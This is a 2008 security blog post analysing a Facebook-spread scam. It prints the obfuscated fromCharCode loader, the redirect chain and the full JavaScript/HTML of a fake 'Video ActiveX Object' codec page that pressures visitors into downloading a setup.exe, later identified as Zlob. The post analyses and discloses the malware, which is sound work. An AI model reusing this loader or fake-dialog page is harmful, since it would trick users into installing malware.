Sunday, November 9, 2008

Facebook Worm/Hack Follow-Up...

If you haven't read the previous post on the FaceBook "email hack/possible worm", you can read it here first.

In response to the post, my friend Rob Ragan was kind enough to spend some of his time dissecting it and provided further analysis... Here is that analysis. Thanks to Rob for this.

------------------------------{analysis}-----------

Some googling after disecting the info below yielded this:
document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));


Writes out
{script src="http://lostart.info/js/js.js" /}

which contains
location="http://off34.com/go/fb.php/"

Which then gives a 302 redirect to
http://youtube-spyvideo.com/youtube_file.html

Which has an iframe like so
{IFRAME src="http://ahdirz.com/movie1.php?id=638&n=teen" height="100%" width="100%" border="0"}
Which gives us a final destination of
http://top100clipz.com/m6/movie1.php?id=638&n=teen
and this screen shot.

Thanks to all this:
{script language="javascript" src="http://top100clipz.com/popup/pop1_2007-09-04.js?id=638"}{/script}
{script language="javascript" src="http://top100clipz.com/popup/pre_2007-09-04.js?id=638"}{/script}
{script language="jscript.encode" src="http://top100clipz.com/popup/pop2_2007-09-04.js?id=638"}{/script}

{html lang="en-EN"}
{head}
{meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /}
{title}Movie{/title}
{style}
body,td,th,tr,a,img {cursor:default;}
#mainbody {background-color:#000;}
#movie {border:1px solid #fff;}
#movie a {cursor:pointer;}
{/style}
{script}
?function detecting(){
try
{
var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
return true;
}
catch(e)
{
;
}

return false;
}

function releaseMovie() {
if (detecting()) {
document.getElementById('playMov').innerHTML = '{embed src="http://dwnld-clips.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"}{/embed}';
}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='http://www.cmplcoupler.com/download.php?id=638'", 3000);
}
}
{/script}
{/head}

{body id="mainbody"}{script}

var transcode = new Array;
window.transcode[0] = 'V'+'i'+'d'+'eo Act'+'iv'+'eX Obj'+'ect E'+'r'+'ror.\n\nY'+'o'+'ur brow'+'ser ca'+'nnot pl'+'a'+'y this vi'+'de'+'o file.\nCli'+'ck \'OK\' to dow'+'nlo'+'ad an'+'d install mis'+'sing V'+'id'+'eo Act'+'ive'+'X O'+'bj'+'ec'+'t.';
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';
window.transcode[2] = 'Yo'+'u m'+'us'+'t do'+'wn'+'lo'+'ad V'+'id'+'eo A'+'ct'+'iv'+'eX O'+'bject t'+'o pl'+'ay th'+'is v'+'ideo f'+'ile.';

{/script}
{script}

codecDownload();

{/script}
{script}

var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Downloadings(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
switch (download)
{
case "iax": document.location.href="http://www.cmplcoupler.com/download.php?id=638"; break;
Close();
}

}

function tracking() {
if (confirm(window.transcode[0])) {
location.href="http://www.cmplcoupler.com/download.php?id=638";
}
else {
if (alert(window.transcode[1])) {
tracking();
}
else {
tracking();
}
}
}

function Close()
{
var p=document.getElementById("popdiv");
p.style.visibility="hidden";
tracking();
}
function Details()
{
alert(window.transcode[2]);
}

{/script}

{div name="popdiv" id="popdiv" onKeyPress="Downloadings('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;"}
{table width="474" cellpadding="0" cellspacing="0"}
{tr}
{td height="28" width="8" style="background-image:url(/img/vista-ltc.gif);"}{/td}
{td height="28" width="458" style="background-image:url(/img/vista-bgtop.gif);"}
{table width="458" cellpadding="0" cellspacing="0"}
{tr}
{td style="font-size: 12px; font-family:Segoe UI; color: #000000; padding-top:5px; padding-left: 6px;" id="w_title"}{/td}
{script} document.getElementById('w_title').innerHTML = "V"+"ide"+"o Ac"+"tiv"+"eX Ob"+"je"+"ct Er"+"ro"+"r.";{/script}
{td width="28" style="padding-top:6px; padding-right: 2px;"}{img src="/img/vista-close.gif" width="28" height="15" border="0" onClick="Close();" style="cursor:default;" /}{/td}
{/tr}
{/table}
{td height="28" width="8" style="background-image:url(/img/vista-rtc.gif);"}{/td}
{/tr}
{tr}
{td width="8" style="background-image:url(/img/vista-bgleft.gif);"}{/td}
{td width="458" style="background-image:url(/img/vista-1x1.gif);"}
{table width="458" cellpadding="0" cellspacing="8" style="padding-top:18px; padding-bottom:18px; background-image:url(/img/vista-1x1.gif);" align="center"}
{tr}
{td width="32" style="padding-left: 18px; vertical-align: top;"}{img src="/img/vista-alert.gif" width="32" height="32" border="0" /}{/td}
{td style="font-size: 12px; font-family:Segoe UI; text-align:justify; padding-left: 4px; padding-right: 20px;" id="w_content"}
{/td}
{script} document.getElementById('w_content').innerHTML = "Your bro"+"wser ca"+"nnot dis"+"play th"+"is vi"+"deo fi"+"le. You nee"+"d to dow"+"nload new "+"vers"+"ion of Vid"+"eo Ac"+"tiveX O"+"bject to play "+"this "+"video "+"file.{"+"br}{"+"br}You need"+" to do"+"wnload new"+" vers"+"ion of Vid"+"eo Ac"+"tiveX Obje"+"ct to p"+"lay th"+"is v"+"ideo f"+"ile.";{/script}
{/tr}
{/table}
{table width="458" height="52" cellpadding="0" cellspacing="0" style="background-color: #f0f0f0;padding-right: 8px;"}
{tr}
{td}
{table align="right" cellpadding="4" cellspacing="0"}
{tr}
{td}{input type="button" value="Continue" onClick="Downloadings('iax');" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" tabindex="1" ID="Button1" NAME="Button1"}{/td}
{td}{input type="button" value="Cancel" onClick="Close()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td}{input type="button" value="Details..." onClick="Details()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{/tr}
{/table}
{/td}
{/tr}
{/table}
{/td}
{td width="8" style="background-image:url(/img/vista-bgright.gif);"}{/td}
{/tr}
{tr}
{td height="8" width="8" style="background-image:url(/img/vista-lbc.gif);"}{/td}
{td height="8" width="458" style="background-image:url(/img/vista-bgbottom.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-rbc.gif);"}{/td}
{/tr}
{/table}
{script}
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (detecting()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (detecting()) { } else {
setTimeout("showPopDiv();",2000);
}
}

function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}


if(!byFlag) {
var p=document.getElementById("popdiv");
wmpwidth=document.body.clientWidth/2-181;
wmpheight=document.body.clientHeight/2-120;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
{/script}
{/div}

{table id="movie" align="center" cellpadding="0" cellspacing="0"}{tr}{td id="playMov"}{a href="http://www.cmplcoupler.com/download.php?id=638"}{img width="450" style="cursor:pointer;" onMouseOver="window.status = window.transcode[2];" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/}{/a}{/td}{/tr}{/table}
{script}releaseMovie();{/script}

{/body}
{/html}
-----------------------------{/analysis}-----------

Final Word:
Wow! Thanks Rob for that analysis... Looking through all that code, redirects and mis-direction you can clearly see the final result is an attempt to get the user to install some setup.exe file, as a "missing codec" for whatever video you are presumably being redirected to. Fascinating! If anyone has been able to grab that setup.exe file please let me know, I have not been able to get it to download properly as of this morning.

3 comments:

sil said...

ping me @ sil@{infiltrated,tormenting.net||disgraced.org} for the binary

Rafal said...

@sil: I have gotten the file (but have not had a chance to do a full analysis). The file appears to be a "downloader" class adware/malware dropper.

Have you had time or been able to do any analysis on this to determine what, if anything, its purpose is?

Anonymous said...

Hi,

Origine: sbox://www.cmplcoupler.com/download.php?id=10 [Apache/2.2.9 (Fedora)]
IP: 208.73.210.50
Country: United States (USA)
Localisation: California, Los Angeles
Sat: -118.2642;34.053
Filename: setup.exe
Size: 72 858 octets
Packer: Nullsoft PiMP Stub [Nullsoft PiMP SFX]
EP: 00003225
Section: .text
EPOffset: 00002625
Linker: 6.0
SubSystem: Win32 +GUI
MD5: 35c65df20adb21ac413739389f59a2d9
SHA1: 0ccf9388dc7e6621be0601ac0708ac1c5a9b90d5
Analysis: threatexpert.com/report.aspx?md5=35c65df20adb21ac413739389f59a2d9
VT: ~6/36

Zlob ;)
secubox.aldria.com/topic-2473.html

Google+